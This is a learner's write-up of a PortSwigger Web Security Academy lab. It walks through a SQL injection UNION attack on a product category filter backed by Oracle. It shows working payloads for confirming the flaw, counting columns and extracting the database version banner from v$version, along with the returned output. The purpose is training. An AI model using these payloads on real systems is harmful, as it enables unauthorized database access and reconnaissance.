This lab contains an [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

# Practical
## Tasks
* Make the database retrieve the strings: 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production, PL/SQL Release 11.2.0.2.0 - Production, CORE 11.2.0.2.0 Production, TNS for Linux: Version 11.2.0.2.0 - Production, NLSRTL Version 11.2.0.2.0 - Production'

Let's check out how the site works first. Looks like the only URL we can get is from the categories.
```html
https://ac941f3d1f595e8f8000298b00ef0010.web-security-academy.net/filter?category=Food+%26+Drink
```
Let's test if it's vulnerable to SQL injection or not.
```html
https://ac941f3d1f595e8f8000298b00ef0010.web-security-academy.net/filter?category=%27
```
It is vulnerable, let's try a UNION attack on it.
But first we need to determine the number of columns and data types.

Let's use the two methods.
We'l start if with ORDER BY 1--, then slowly increment until app breaks.
```sql
' ORDER BY 3--
```
We get an error at 3. Let's do it again but with the second method.
```sql
' UNION SELECT NULL,NULL,NULL--
```
Again it breaks but if we try with 2 it also breaks.
If you view the hint it says that
```txt
On Oracle databases, every `SELECT` statement must specify a table to select `FROM`. If your `UNION SELECT` attack does not query from a table, you will still need to include the `FROM` keyword followed by a valid table name.
```
So let's view the cheat sheet to determine the table name for versions.
```sql
SELECT banner FROM v$version  
SELECT version FROM v$instance
```
So there's 2 ways. Let's use the first one.
```sql
' UNION SELECT NULL,NULL FROM v$version--
```
and the page renders fine.
Let's try replacing one of the NULL values with banner.
```sql
' UNION SELECT banner,NULL FROM v$version--
```
Response
```txt
CORE 11.2.0.2.0 Production

NLSRTL Version 11.2.0.2.0 - Production

Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

PL/SQL Release 11.2.0.2.0 - Production

TNS for Linux: Version 11.2.0.2.0 - Production
```
And just like that we have the versions and solved the lab.